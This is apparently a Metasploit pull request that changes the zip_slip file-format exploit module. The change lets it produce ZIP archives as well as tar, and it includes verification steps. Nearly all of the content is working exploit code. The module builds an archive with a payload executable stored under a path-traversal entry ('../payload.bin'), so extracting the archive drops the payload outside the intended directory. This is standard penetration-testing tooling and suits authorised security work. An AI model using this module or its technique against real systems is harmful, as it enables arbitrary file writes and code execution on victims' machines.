### PR TITLE
Add support for ZIP file generation in zip_slip exploit

### DIFF
--- a/modules/exploits/multi/fileformat/zip_slip.rb
+++ b/modules/exploits/multi/fileformat/zip_slip.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     register_options([
-      OptString.new('FNAME', [true, 'The name of the archive file (without extension)', 'msf']),
+      OptString.new('FILENAME', [true, 'The name of the archive file', 'msf.tar']),
       OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip'] ]),
       OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
     ])
@@ -105,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     archive = make_archive(target_payload_path, datastore['FTYPE'])
-    datastore['FILENAME'] = datastore['FNAME'] + '.' + datastore['FTYPE']
     file_create(archive)
     print_status('When extracted, the payload is expected to extract to:')
     print_status(target_payload_path)

--- a/modules/exploits/multi/fileformat/zip_slip.rb
+++ b/modules/exploits/multi/fileformat/zip_slip.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'Snyk',  # Technique discovery
-          'sinn3r' # Metasploit
+          'sinn3r', # Metasploit
+          'ggkitsas'
         ],
       'References'     =>
         [
@@ -48,7 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     register_options([
-      OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),
+      OptString.new('FNAME', [true, 'The name of the archive file (without extension)', 'msf']),
+      OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip'] ]),
       OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
     ])
   end
@@ -57,32 +59,41 @@ class MetasploitModule < Msf::Exploit::Remote
     attr_reader :data
     attr_reader :fname
     attr_reader :payload
+    attr_reader :type
 
-    def initialize(n, p)
+    def initialize(n, p, t)
       @fname = n
       @payload = p
+      @type = t
       @data = make
     end
 
     def make
       data = ''
       path = Rex::FileUtils.normalize_unix_path(fname)
-      tar = StringIO.new
-      Rex::Tar::Writer.new(tar) do |t|
-        t.add_file(path, 0777) do |f|
-          f.write(payload)
+
+      if type == 'tar'
+        contents = StringIO.new
+        Rex::Tar::Writer.new(contents) do |t|
+          t.add_file(path, 0777) do |f|
+            f.write(payload)
+          end
         end
+        contents.seek(0)
+        data = contents.read
+        contents.close
+        data
+      elsif type == 'zip'
+        zip = Rex::Zip::Archive.new
+        zip.add_file(path, payload)
+        data = zip.pack
       end
-      tar.seek(0)
-      data = tar.read
-      tar.close
-      data
     end
   end
 
-  def make_tar(target_payload_path)
+  def make_archive(target_payload_path, type)
     elf = generate_payload_exe(code: payload.encoded)
-    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe)
+    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe, type)
     archive.make
   end
 
@@ -93,8 +104,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    tar = make_tar(target_payload_path)
-    file_create(tar)
+    archive = make_archive(target_payload_path, datastore['FTYPE'])
+    datastore['FILENAME'] = datastore['FNAME'] + '.' + datastore['FTYPE']
+    file_create(archive)
     print_status('When extracted, the payload is expected to extract to:')
     print_status(target_payload_path)
   end


### PR DESCRIPTION
Add support for generating ZIP files for the zip_slip exploit.

## Verification
- Start `msfconsole`
- `use exploits/multi/fileformat/zip_slip`
- `set FTYPE zip`
- `exploit`
- **Verify** A file `msf.zip` should be created
- **Verify** `zipinfo -1 msf.zip` should present `../payload.bin`
